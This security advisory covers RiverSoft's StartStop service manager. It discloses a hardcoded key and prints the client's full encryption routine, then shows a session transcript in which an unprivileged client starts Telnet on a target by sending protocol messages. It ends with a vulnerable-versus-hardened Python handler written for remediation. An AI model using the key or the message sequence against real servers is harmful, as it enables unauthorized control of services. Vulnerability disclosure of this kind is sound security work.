Start/Stop RiverSoft vulnerabilities


Research Notes:
--------------
Product: StartStop
Company: Riversoft
Website: www.rivernorthsoftware.com
Vendor contacted: We sent two e-mails. The company never responded.
Author: Francisco Amato

Encryption weakness:
It uses a very simple encryption routine with a hardcoded key.
The key and the function that encrypts/decrypts are both in the Java applet client.
sKey = "%$sTa$*(rt@$`ST*!@#oP!!@#"
 
Function to decrypt/encrypt:
----------------------------------------
private String Crypt(String Action, String sSource)
    {
        String sKey = "";
        String sDest = "";
        String sHexTemp = "";
        int lKeyPos = -1;
        // Hardcoded key. The decompiled code compared with "==", which only
        // works here because both literals are interned; isEmpty() is the correct test.
        if(sKey.isEmpty())
            sKey = "%$sTa$*(rt@$`ST*!@#oP!!@#";
        int lKeyLen = sKey.length();
        if(Action.compareTo("E") == 0)
        {
            // Encrypt: a random one-byte offset is sent in clear as the first hex pair;
            // each character is then shifted by the previous ciphertext byte and
            // XORed with the repeating key.
            int lOffSet = (int)( Math.random() * 255D);
            sDest = Integer.toHexString(lOffSet & 0xff);
            if(sDest.length() < 2)
                sDest = " " + sDest;   // padded with a space, not a zero; decrypt trims it
            for(int lSrcPos = 0; lSrcPos < sSource.length(); lSrcPos++)
            {
                int lSrcAsc = sSource.charAt(lSrcPos) + lOffSet;
                lSrcAsc %= 255;
                if(lKeyPos < lKeyLen - 1)
                    lKeyPos++;
                else
                    lKeyPos = 0;
                lSrcAsc ^= sKey.charAt(lKeyPos);
                sHexTemp = Integer.toHexString(lSrcAsc & 0xff);
                if(sHexTemp.length() < 2)
                    sHexTemp = " " + sHexTemp;
                sDest = sDest + sHexTemp;
                lOffSet = lSrcAsc;   // chain: next character is shifted by this byte
            }
        }
        else if(Action.compareTo("D") == 0)
        {
            // Decrypt: read the offset from the first hex pair, then undo the XOR
            // and the shift for every following pair.
            try
            {
                String sFirst = sSource.substring(0, 2);
                sFirst = sFirst.trim();
                int lOffSet = Integer.parseInt(sFirst, 16);
                for(int lSrcPos = 2; lSrcPos < sSource.length(); lSrcPos += 2)
                {
                    String sTemp = sSource.substring(lSrcPos, lSrcPos + 2);
                    sTemp = sTemp.trim();
                    int lSrcAsc = Integer.parseInt(sTemp, 16);
                    if(lKeyPos < lKeyLen - 1)
                        lKeyPos++;
                    else
                        lKeyPos = 0;
                    int lTmpArcAsc = lSrcAsc ^ sKey.charAt(lKeyPos);
                    if(lTmpArcAsc <= lOffSet)
                        lTmpArcAsc = (255 + lTmpArcAsc) - lOffSet;
                    else
                        lTmpArcAsc -= lOffSet;
                    String sDestTemp = String.valueOf((char)lTmpArcAsc);
                    sDest = sDest + sDestTemp;
                    lOffSet = lSrcAsc;
                }
            }
            catch(Exception _ex)
            {
                sDest = "";   // any malformed input silently yields an empty string
            }
        }
        return sDest;
    }

You have to use standard encryption. You also have to keep in mind that Java is a language that is very easy to disassemble to recover the source code.

Permission weakness:

It is possible to write a different client that connects to the server and sends start/stop/shutdown/restart commands without having permission for those tasks. The Java applet client is the only place where the action is checked, and that client can be modified or replaced with a new one.
The permission check has to be done on the server, not in the client.


#Check if the service is up
root@blackhat:~# telnet 192.168.2.2 23
Trying 192.168.2.2... 
telnet: connect to address 192.168.2.2: Connection refused

#Execute the client
francisco@blackhat:~/start_stop$ perl client.pl

(blue: server response)
(red: information sent by the client)

#Hello message
r (LOGINACK;A1F7 A333F;) 

#Check if we are administrator
(ISADMIN;1668;)

#We are not administrator
r (ISADMINACK;N;)

#Send the command to refresh the list of services
(REFRESH;1668;)

#Get the list of services we have permission for
r (REFRESHACK;3;
J Walk Server - EXTRANET| 
J Walk Server - EXTRANET|Running} 
J Walk Server - ILATINA| 
J Walk Server - ILATINA|Running} 
J Walk Server - INTRANET| 
J Walk Server - INTRANET|Running};) 

#Send the command to start the Telnet service
(START;1668;Y;TlntSvr;Telnet;)

#Command was processed
r (STARTACK;Telnet;)

#Check the vulnerability
root@blackhat:~# telnet 192.168.2.2 23
Trying 192.168.2.2...
Connected to 192.168.2.2 .
Escape character is '^]'.

Server allows NTLM authentication only 
Server has closed connection
root@blackhat:~# 
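The permission weakness above, as an added example that is not RiverSoft's code: a minimal server-side handler for the "(COMMAND;session;...)" messages seen in the transcript, with the client-trusting version beside the corrected one. The session table, the reading of the third START field as a client-asserted admin flag, and the set of command names are assumptions made for the example.

```python
import re

# Messages look like "(START;1668;Y;TlntSvr;Telnet;)": fields separated by ';'.
MSG_RE = re.compile(r"^\((?P<fields>[^()]*);\)$")

# Constructed server-side session table (hypothetical): what the server itself
# recorded at login, independent of anything the client later claims.
SESSIONS = {
    "1668": {"is_admin": False,
             "services": {"J Walk Server - EXTRANET",
                          "J Walk Server - ILATINA",
                          "J Walk Server - INTRANET"}},
    "2001": {"is_admin": True, "services": set()},
}

# Assumed set of service-control commands handled by the server.
CONTROL_COMMANDS = {"START", "STOP", "RESTART", "SHUTDOWN"}


def parse_message(raw):
    """Split a "(CMD;field;field;)" message into its list of fields."""
    m = MSG_RE.match(raw.strip())
    if not m:
        raise ValueError("malformed message: %r" % raw)
    return m.group("fields").split(";")


def handle_vulnerable(raw):
    """Weak pattern: the server believes the client's own admin flag ("Y")."""
    cmd, _session, admin_flag, _svc, display = parse_message(raw)
    if admin_flag == "Y":
        return "(%sACK;%s;)" % (cmd, display)
    return "(%sACK;DENIED;)" % cmd


def handle_hardened(raw):
    """Fixed pattern: authorization comes only from server-side session state."""
    fields = parse_message(raw)
    cmd, session = fields[0], fields[1]
    if cmd not in CONTROL_COMMANDS or len(fields) < 5:
        return "(ERROR;bad request;)"
    sess = SESSIONS.get(session)
    if sess is None:
        return "(ERROR;no such session;)"
    display = fields[4]  # display name, as listed in REFRESHACK
    if sess["is_admin"] or display in sess["services"]:
        return "(%sACK;%s;)" % (cmd, display)
    return "(%sACK;DENIED;)" % cmd
```

With the transcript's own START message, the weak handler answers (STARTACK;Telnet;) exactly as the real server did, while the hardened one denies it because session 1668 is not an administrator and Telnet is not in its list.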
